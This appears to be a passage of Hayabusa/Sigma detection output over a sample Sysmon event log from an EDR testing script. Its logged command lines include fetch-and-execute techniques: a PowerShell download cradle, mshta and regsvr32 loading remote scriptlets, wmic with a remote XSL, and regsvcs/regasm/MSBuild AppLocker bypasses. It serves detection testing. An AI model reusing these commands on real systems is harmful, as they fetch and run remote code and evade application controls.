javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 
06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker 
Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 
AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 
+09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 